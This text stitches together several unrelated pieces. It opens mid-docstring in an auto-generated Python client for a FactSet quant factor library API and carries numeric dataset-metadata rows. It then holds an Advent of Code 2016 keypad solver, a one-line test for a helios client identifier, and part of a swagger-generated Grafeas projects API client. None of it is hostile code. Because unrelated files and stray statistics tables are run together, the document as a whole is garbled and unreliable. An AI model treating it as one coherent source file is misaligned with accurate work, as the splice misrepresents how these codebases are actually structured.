factor_groups ([str]): Fetch a collection of Factors that fall within one of the below \"groups\". For example, resting factorGroup=Momentum will return all factors under the momentum group. To know which items are available in each group use the /library endpoint.***<p>factor groups limit** = 5 factor groups per request* ### Classification and Reference |Group|Descriptions| |---|---| |Asset_Data|Easily input security-level metadata into your quantitative research process. Common metrics used include Days Since Report, Days to Report, ADR Flag, and Minimum Lot Size. Integrate variables from FactSet Reference, FactSet Fundamentals, and FactSet Estimates databases to impose portfolio constraints and access general reference data.| |Country|Evaluate securities based on the countries in which they have the highest exposure. Analyze company-level exposures across various countries and measure how concentrated a firm’s business is within their countries of operation. Metrics are derived from FactSet Reference and FactSet Geographic Revenue Exposure (GeoRev) databases and include Country Exposure, Country of Incorporation, and Country of Risk.| |Industry|Classify securities based on the industries in which they generate the majority of their revenues. Incorporate variables from the FactSet Revere Business and Industry Classification System (RBICS) database to measure how concentrated a firm’s business is within the industries they operate and across various sub-sectors. Common metrics include Industry Classifications, Industry Exposures, and Industry Concentration.| |Size|Assess how large or small a company is relative to industry peers. Create size buckets and clarify the systematic portion of company returns using variables from FactSet Prices, FactSet RBICS, FactSet Fundamentals, and FactSet Estimates. Common metrics include Size Classification, Enterprise Value, and Market Share.| ### Market Factors |Group|Descriptions| |---|---| |Liquidity|Assess how investible a security is, as well as the potential market impact of a trade using signals built off pricing and volume data from FactSet Prices. Integrate factors as components into your alpha models to evaluate systematic risk or input them into your portfolio construction models to dictate how much of an asset can be bought or sold based on liquidity levels. Common metrics include Average Dollars Traded, Share Turnover, and Bid Ask Spread.| |Market Sensitivity|Clarify the common variations in stock returns attributable to the performance of their local market indices. Leverage regressions performed between security-level and market-index returns across different return horizons and methodologies. Metrics are derived from FactSet Prices and include Beta R-Squared, Up Market Beta, and Down Market Beta.| |Momentum|Analyze the historical momentum of a security and uncover how each underlying data item, calculation, and horizon can be meaningful in different situations. Metrics are derived from FactSet Prices and include 52W Position, Return Momentum, and Velocity.| |Technical|Forecast the direction of future price movements based on historical market data and leverage heuristic or pattern-based signals from FactSet Prices. Common metrics include Average True Range, Ulcer Performance Index, and Money Flow Volume.| |Volatility|Measure the uncertainty in asset price movements with indicators from the FactSet Prices database. Capture various forms of uncertainty by employing statistical calculations on security performance data. Common metrics include Return Volatility, Semivariance, and Turbulence.| ### Core Fundamentals |Group|Descriptions| |---|---| |Efficiency|Leverage core financial data to determine how effectively a company uses its assets, collects payments, and operates its business. Most variables are measured as turnover ratios and include changes over time to provide transparency into the efficiency of each business process. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Asset Turnover, Receivables Turnover, and Cash Conversion Cycle| |Growth|Measure a company’s ability to grow faster than its peers. Compare the future expected growth of a company with its historical growth and view growth rates adjusted for stability. Integrate variables from FactSet RBICS, FactSet Fundamentals, and FactSet Estimates to analyze growth rates over multiple horizons including Market Share, Sales, and EPS Growth| |Management|Gain insight into how management finances their business and the decisions they make that impact the core financial statements. These choices are reflected in changes to total debt or equity, the overall size of the balance sheet, and decisions around the accounting methods used. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Capital Expenditures (CAPEX) Growth, Equity Buyback Ratio, and Depreciation & Amortization Variability| |Profitability|Evaluate a company’s ability to generate income relative to its revenue or balance sheet metrics. Identify lucrative businesses relative to their industry, region, and size profile. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Return on Assets, Return on Invested Capital Change, and Return on Total Equity |Quality|Understand the overall financial health and quality of a company’s business. Use historical data from FactSet Fundamentals to analyze balance sheet health, stability of earnings and profit margins, variability in cash flows, and trends that look beyond headline financial metrics. Common metrics include Cash Earnings Ratio Variability, Revenue Stability, and Accruals Ratios. Composite quality scores (i.e., the Piotroski F-Score, Beneish M-Score, and Altman Z-Score) and their underlying components are also available as individual metrics.| |Solvency|Measure a company’s ability to meet their short- and long-term financial obligations and determine the degree of leverage employed to run their business. Incorporate financial ratios from FactSet Fundamentals and FactSet Estimates to quantify liability or debt obligation relative to earnings, cash flows, equities, or items from the asset side of the balance sheet. Common metrics include Current Ratio, Current Asset Liquidity, and Debt to Equity Change.| |Value|Quickly determine how cheap or expensive a company is based on common security-level characteristics from FactSet Prices, FactSet Fundamentals, and FactSet Estimates. Apply factors as an intersection between other factors for a more customized analysis, such as finding the cheapest stocks among the highest quality companies. Common metrics include Earnings Yield, Book to Price, and Revenue to Enterprise Value.| ### Macro and Cross-Asset |Group|Descriptions| |---|---| |Commodity|Quantify the impact movements in the commodity markets have on equity prices. Metrics are derived from FactSet Prices and allow you to measure company-level exposure to commodities such as Gold, Crude Oil, Coffee, and Live Cattle.| |FX_Sensitivity| Analyze security-level sensitivity to fluctuations in the currency markets. Metrics are derived from FactSet Prices and allow you to identify company exposures to currencies such as USD, EUR, JPY, and CNY. |Debt|Uncover details related to company debt through issuer-level factor exposures. Use the FactSet Fixed Income Prices & Derived Analytics database to aggregate metrics at the company level. Common metrics include Effective Duration, Option Adjusted Spread, and Yield to Worst.| |Economic|Capture daily security exposures to leading economic indicator forecasts. Leverage the Quant Factor Library’s detailed country exposure model to attribute economic measures to individual companies. Metrics are derived from FactSet Economic Estimates and include Real GPD Growth, Industrial Production Growth, Core CPI Inflation, and Policy Rates. ### Alternative |Group|Descriptions| |---|---| |Analyst_Sentiment|Analyze a security’s outlook from the perspective of a sell-side research analyst. Leverage consensus estimates data from the FactSet Estimates database to analyze the directional change in estimate revisions for various financial statement items and time periods. Common metrics include Sales Estimate Revisions, Free Cash Flow Estimate Revisions, and Robust Estimate Revisions.| |Corporate_Governance|Identify companies with strong corporate governance. Analyze the profile of a company’s management and board based on tenure, diversity, compensation incentives, and more factors from the FactSet People database. Common metrics include Management - Average Age, Board - Activist Member, and Executives - Average Bonus.| |Crowding|Understand the degree to which investors own, purchase, or sell a security. View characteristics of each investor’s profile and characterize crowding from passive, active, institutional, ETF, and hedge fund investors. Use metrics from FactSet Ownership, FactSet Prices, and FactSet Fundamentals to help identify potential effects of crowding such as whether certain investor types are acquiring or divesting from a given security. Common metrics include Active Buyer Percent of Portfolio Change, ETF Days to Liquidate, and Hedge Fund Percent Outstanding.| |Insider_Activity|Measure the degree to which insiders own, purchase, or sell their company’s stock. Analyze the sentiment of those with access to material non-public information or determine how the amount of insider ownership may impact management’s key business decisions. Metrics are derived from FactSet Ownership and include Insider Percent Outstanding, Insider Number of Buys, and Insider Seller Position Change. |ESG|Analyze Environmental, Social and Governance (ESG) behavior, which are aggregated and categorized into continuously updated, material ESG scores to uncover risks and opportunities from companies. Truvalue Labs focuses on company ESG behavior from external sources and includes both positive and negative events that go beyond traditional sources of ESG risk data. . [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[LibraryResponse]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.get_factor_library_endpoint.call_with_http_info(**kwargs)
def get_factor_library_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[LibraryResponse, int, typing.MutableMapping]]":
"""Retrieve a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
factors ([str]): Array of individual Factor Items requested for the library endpoint. Use the factorGroups parameter to pull for a full list of factors based off the input group. . [optional]
factor_groups ([str]): Fetch a collection of Factors that fall within one of the below \"groups\". For example, resting factorGroup=Momentum will return all factors under the momentum group. To know which items are available in each group use the /library endpoint.***<p>factor groups limit** = 5 factor groups per request* ### Classification and Reference |Group|Descriptions| |---|---| |Asset_Data|Easily input security-level metadata into your quantitative research process. Common metrics used include Days Since Report, Days to Report, ADR Flag, and Minimum Lot Size. Integrate variables from FactSet Reference, FactSet Fundamentals, and FactSet Estimates databases to impose portfolio constraints and access general reference data.| |Country|Evaluate securities based on the countries in which they have the highest exposure. Analyze company-level exposures across various countries and measure how concentrated a firm’s business is within their countries of operation. Metrics are derived from FactSet Reference and FactSet Geographic Revenue Exposure (GeoRev) databases and include Country Exposure, Country of Incorporation, and Country of Risk.| |Industry|Classify securities based on the industries in which they generate the majority of their revenues. Incorporate variables from the FactSet Revere Business and Industry Classification System (RBICS) database to measure how concentrated a firm’s business is within the industries they operate and across various sub-sectors. Common metrics include Industry Classifications, Industry Exposures, and Industry Concentration.| |Size|Assess how large or small a company is relative to industry peers. Create size buckets and clarify the systematic portion of company returns using variables from FactSet Prices, FactSet RBICS, FactSet Fundamentals, and FactSet Estimates. Common metrics include Size Classification, Enterprise Value, and Market Share.| ### Market Factors |Group|Descriptions| |---|---| |Liquidity|Assess how investible a security is, as well as the potential market impact of a trade using signals built off pricing and volume data from FactSet Prices. Integrate factors as components into your alpha models to evaluate systematic risk or input them into your portfolio construction models to dictate how much of an asset can be bought or sold based on liquidity levels. Common metrics include Average Dollars Traded, Share Turnover, and Bid Ask Spread.| |Market Sensitivity|Clarify the common variations in stock returns attributable to the performance of their local market indices. Leverage regressions performed between security-level and market-index returns across different return horizons and methodologies. Metrics are derived from FactSet Prices and include Beta R-Squared, Up Market Beta, and Down Market Beta.| |Momentum|Analyze the historical momentum of a security and uncover how each underlying data item, calculation, and horizon can be meaningful in different situations. Metrics are derived from FactSet Prices and include 52W Position, Return Momentum, and Velocity.| |Technical|Forecast the direction of future price movements based on historical market data and leverage heuristic or pattern-based signals from FactSet Prices. Common metrics include Average True Range, Ulcer Performance Index, and Money Flow Volume.| |Volatility|Measure the uncertainty in asset price movements with indicators from the FactSet Prices database. Capture various forms of uncertainty by employing statistical calculations on security performance data. Common metrics include Return Volatility, Semivariance, and Turbulence.| ### Core Fundamentals |Group|Descriptions| |---|---| |Efficiency|Leverage core financial data to determine how effectively a company uses its assets, collects payments, and operates its business. Most variables are measured as turnover ratios and include changes over time to provide transparency into the efficiency of each business process. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Asset Turnover, Receivables Turnover, and Cash Conversion Cycle| |Growth|Measure a company’s ability to grow faster than its peers. Compare the future expected growth of a company with its historical growth and view growth rates adjusted for stability. Integrate variables from FactSet RBICS, FactSet Fundamentals, and FactSet Estimates to analyze growth rates over multiple horizons including Market Share, Sales, and EPS Growth| |Management|Gain insight into how management finances their business and the decisions they make that impact the core financial statements. These choices are reflected in changes to total debt or equity, the overall size of the balance sheet, and decisions around the accounting methods used. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Capital Expenditures (CAPEX) Growth, Equity Buyback Ratio, and Depreciation & Amortization Variability| |Profitability|Evaluate a company’s ability to generate income relative to its revenue or balance sheet metrics. Identify lucrative businesses relative to their industry, region, and size profile. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Return on Assets, Return on Invested Capital Change, and Return on Total Equity |Quality|Understand the overall financial health and quality of a company’s business. Use historical data from FactSet Fundamentals to analyze balance sheet health, stability of earnings and profit margins, variability in cash flows, and trends that look beyond headline financial metrics. Common metrics include Cash Earnings Ratio Variability, Revenue Stability, and Accruals Ratios. Composite quality scores (i.e., the Piotroski F-Score, Beneish M-Score, and Altman Z-Score) and their underlying components are also available as individual metrics.| |Solvency|Measure a company’s ability to meet their short- and long-term financial obligations and determine the degree of leverage employed to run their business. Incorporate financial ratios from FactSet Fundamentals and FactSet Estimates to quantify liability or debt obligation relative to earnings, cash flows, equities, or items from the asset side of the balance sheet. Common metrics include Current Ratio, Current Asset Liquidity, and Debt to Equity Change.| |Value|Quickly determine how cheap or expensive a company is based on common security-level characteristics from FactSet Prices, FactSet Fundamentals, and FactSet Estimates. Apply factors as an intersection between other factors for a more customized analysis, such as finding the cheapest stocks among the highest quality companies. Common metrics include Earnings Yield, Book to Price, and Revenue to Enterprise Value.| ### Macro and Cross-Asset |Group|Descriptions| |---|---| |Commodity|Quantify the impact movements in the commodity markets have on equity prices. Metrics are derived from FactSet Prices and allow you to measure company-level exposure to commodities such as Gold, Crude Oil, Coffee, and Live Cattle.| |FX_Sensitivity| Analyze security-level sensitivity to fluctuations in the currency markets. Metrics are derived from FactSet Prices and allow you to identify company exposures to currencies such as USD, EUR, JPY, and CNY. |Debt|Uncover details related to company debt through issuer-level factor exposures. Use the FactSet Fixed Income Prices & Derived Analytics database to aggregate metrics at the company level. Common metrics include Effective Duration, Option Adjusted Spread, and Yield to Worst.| |Economic|Capture daily security exposures to leading economic indicator forecasts. Leverage the Quant Factor Library’s detailed country exposure model to attribute economic measures to individual companies. Metrics are derived from FactSet Economic Estimates and include Real GPD Growth, Industrial Production Growth, Core CPI Inflation, and Policy Rates. ### Alternative |Group|Descriptions| |---|---| |Analyst_Sentiment|Analyze a security’s outlook from the perspective of a sell-side research analyst. Leverage consensus estimates data from the FactSet Estimates database to analyze the directional change in estimate revisions for various financial statement items and time periods. Common metrics include Sales Estimate Revisions, Free Cash Flow Estimate Revisions, and Robust Estimate Revisions.| |Corporate_Governance|Identify companies with strong corporate governance. Analyze the profile of a company’s management and board based on tenure, diversity, compensation incentives, and more factors from the FactSet People database. Common metrics include Management - Average Age, Board - Activist Member, and Executives - Average Bonus.| |Crowding|Understand the degree to which investors own, purchase, or sell a security. View characteristics of each investor’s profile and characterize crowding from passive, active, institutional, ETF, and hedge fund investors. Use metrics from FactSet Ownership, FactSet Prices, and FactSet Fundamentals to help identify potential effects of crowding such as whether certain investor types are acquiring or divesting from a given security. Common metrics include Active Buyer Percent of Portfolio Change, ETF Days to Liquidate, and Hedge Fund Percent Outstanding.| |Insider_Activity|Measure the degree to which insiders own, purchase, or sell their company’s stock. Analyze the sentiment of those with access to material non-public information or determine how the amount of insider ownership may impact management’s key business decisions. Metrics are derived from FactSet Ownership and include Insider Percent Outstanding, Insider Number of Buys, and Insider Seller Position Change. |ESG|Analyze Environmental, Social and Governance (ESG) behavior, which are aggregated and categorized into continuously updated, material ESG scores to uncover risks and opportunities from companies. Truvalue Labs focuses on company ESG behavior from external sources and includes both positive and negative events that go beyond traditional sources of ESG risk data. . [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(LibraryResponse, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.get_factor_library_endpoint.call_with_http_info(**kwargs)
def get_factor_library_list(
self,
library_request,
**kwargs
) -> LibraryResponse:
"""Retrieves a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
library_request (LibraryRequest): Available Factors and Related Meta Data.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
LibraryResponse
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['library_request'] = \
library_request
return self.get_factor_library_list_endpoint.call_with_http_info(**kwargs)
def get_factor_library_list_with_http_info(
self,
library_request,
**kwargs
) -> typing.Tuple[LibraryResponse, int, typing.MutableMapping]:
"""Retrieves a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
library_request (LibraryRequest): Available Factors and Related Meta Data.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
LibraryResponse
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['library_request'] = \
library_request
return self.get_factor_library_list_endpoint.call_with_http_info(**kwargs)
def get_factor_library_list_async(
self,
library_request,
**kwargs
) -> "ApplyResult[LibraryResponse]":
"""Retrieves a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
library_request (LibraryRequest): Available Factors and Related Meta Data.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[LibraryResponse]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['library_request'] = \
library_request
return self.get_factor_library_list_endpoint.call_with_http_info(**kwargs)
def get_factor_library_list_with_http_info_async(
self,
library_request,
**kwargs
) -> "ApplyResult[typing.Tuple[LibraryResponse, int, typing.MutableMapping]]":
"""Retrieves a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
library_request (LibraryRequest): Available Factors and Related Meta Data.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(LibraryResponse, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['library_request'] = \
library_request
return self.get_factor_library_list_endpoint.call_with_http_info(**kwargs)
| 119.427788
| 10,065
| 0.735102
| 8,515
| 65,327
| 5.587551
| 0.080329
| 0.017571
| 0.020177
| 0.017655
| 0.951869
| 0.94838
| 0.944996
| 0.942978
| 0.940666
| 0.940666
| 0
| 0.001996
| 0.217659
| 65,327
| 546
| 10,066
| 119.64652
| 0.928935
| 0.840786
| 0
| 0.575342
| 0
| 0
| 0.170886
| 0.047834
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045662
| false
| 0
| 0.041096
| 0
| 0.127854
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c5643a949b693e990a55f2cc7cc2e34d465b8371
| 3,356
|
py
|
Python
|
2016/day02.py
|
mbcollins2/aoc
|
b94380fd5e92b4fe9f4af654e7762174c1c6ac91
|
[
"MIT"
] | null | null | null |
2016/day02.py
|
mbcollins2/aoc
|
b94380fd5e92b4fe9f4af654e7762174c1c6ac91
|
[
"MIT"
] | 3
|
2021-12-15T19:12:38.000Z
|
2021-12-15T19:14:42.000Z
|
2016/day02.py
|
mbcollins2/aoc
|
b94380fd5e92b4fe9f4af654e7762174c1c6ac91
|
[
"MIT"
] | null | null | null |
class solve_day(object):
with open('inputs/day02.txt', 'r') as f:
data = f.readlines()
def part1(self):
grid = [[1,2,3],
[4,5,6],
[7,8,9]]
code = []
## locations
# 1 - grid[0][0]
# 2 - grid[0][1]
# 3 - grid[0][2]
# 4 - grid[1][0]
# 5 - grid[1][1]
# 6 - grid[1][2]
# 7 - grid[2][0]
# 8 - grid[2][1]
# 9 - grid[2][2]
position = [0,0]
for i,d in enumerate(self.data):
d = d.strip()
if i == 0:
# set starting position
position = [1,1]
for x in d:
if x == 'U':
position[0] += -1 if position[0]-1 >= 0 and position[0]-1 <= 2 else 0
if x == 'D':
position[0] += 1 if position[0]+1 >= 0 and position[0]+1 <= 2 else 0
if x == 'R':
position[1] += 1 if position[1]+1 >= 0 and position[1]+1 <= 2 else 0
if x == 'L':
position[1] += -1 if position[1]-1 >= 0 and position[1]-1 <= 2 else 0
code.append(grid[position[0]][position[1]])
return ''.join([str(x) for x in code])
def part2(self):
grid = [['','',1,'',''],
['',2,3,4,''],
[5,6,7,8,9],
['','A','B','C',''],
['','','D','','']]
code = []
position = [0,0]
for i,d in enumerate(self.data):
d = d.strip()
if i == 0:
# set starting position
position = [2,0]
for x in d:
if x == 'U':
if position[1] in [0, 4]:
pass
if position[1] in [1, 3]:
position[0] += -1 if position[0]-1 in [1,2,3] else 0
if position[1] in [2]:
position[0] += -1 if position[0]-1 in [0,1,2,3,4] else 0
if x == 'D':
if position[1] in [0, 4]:
pass
if position[1] in [1, 3]:
position[0] += 1 if position[0]+1 in [1,2,3] else 0
if position[1] in [2]:
position[0] += 1 if position[0]+1 in [0,1,2,3,4] else 0
if x == 'R':
if position[0] in [0, 4]:
pass
if position[0] in [1, 3]:
position[1] += 1 if position[1]+1 in [1,2,3] else 0
if position[0] in [2]:
position[1] += 1 if position[1]+1 in [0,1,2,3,4] else 0
if x == 'L':
if position[0] in [0, 4]:
pass
if position[0] in [1, 3]:
position[1] += -1 if position[1]-1 in [1,2,3] else 0
if position[0] in [2]:
position[1] += -1 if position[1]-1 in [0,1,2,3,4] else 0
code.append(grid[position[0]][position[1]])
return ''.join([str(x) for x in code])
if __name__ == '__main__':
s = solve_day()
print(f'Part 1: {s.part1()}')
print(f'Part 2: {s.part2()}')
| 30.509091
| 89
| 0.353397
| 452
| 3,356
| 2.60177
| 0.130531
| 0.183673
| 0.127551
| 0.020408
| 0.816327
| 0.811224
| 0.808673
| 0.789966
| 0.789966
| 0.789966
| 0
| 0.119308
| 0.483015
| 3,356
| 110
| 90
| 30.509091
| 0.558501
| 0.056019
| 0
| 0.56338
| 0
| 0
| 0.023779
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028169
| false
| 0.056338
| 0
| 0
| 0.070423
| 0.028169
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
c566d84333dbe883bc19714a02a8319e6514f2b9
| 191
|
py
|
Python
|
old_tests/helios/core/utils/test_version.py
|
hyperevo/py-helios-node
|
ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8
|
[
"MIT"
] | null | null | null |
old_tests/helios/core/utils/test_version.py
|
hyperevo/py-helios-node
|
ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8
|
[
"MIT"
] | null | null | null |
old_tests/helios/core/utils/test_version.py
|
hyperevo/py-helios-node
|
ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8
|
[
"MIT"
] | null | null | null |
from helios.utils.version import construct_trinity_client_identifier
def test_construct_trinity_client_identifier():
assert construct_trinity_client_identifier().startswith('Trinity/')
| 31.833333
| 71
| 0.858639
| 22
| 191
| 7
| 0.590909
| 0.311688
| 0.428571
| 0.623377
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073298
| 191
| 5
| 72
| 38.2
| 0.870057
| 0
| 0
| 0
| 0
| 0
| 0.041885
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
3decb52f407efb476fee68e4baa421bade20aa78
| 15,527
|
py
|
Python
|
grafeas/api/grafeas_projects_api.py
|
nyc/client-python
|
e73eab8953abf239305080673f7c96a54b776f72
|
[
"Apache-2.0"
] | null | null | null |
grafeas/api/grafeas_projects_api.py
|
nyc/client-python
|
e73eab8953abf239305080673f7c96a54b776f72
|
[
"Apache-2.0"
] | null | null | null |
grafeas/api/grafeas_projects_api.py
|
nyc/client-python
|
e73eab8953abf239305080673f7c96a54b776f72
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Grafeas API
An API to insert and retrieve annotations on cloud artifacts. # noqa: E501
OpenAPI spec version: v1alpha1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from grafeas.api_client import ApiClient
class GrafeasProjectsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_project(self, body, **kwargs): # noqa: E501
"""Creates a new `Project`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_project(body, async=True)
>>> result = thread.get()
:param async bool
:param ApiProject body: (required)
:return: ProtobufEmpty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_project_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_project_with_http_info(body, **kwargs) # noqa: E501
return data
def create_project_with_http_info(self, body, **kwargs): # noqa: E501
"""Creates a new `Project`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_project_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param ApiProject body: (required)
:return: ProtobufEmpty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_project`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/projects', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProtobufEmpty', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
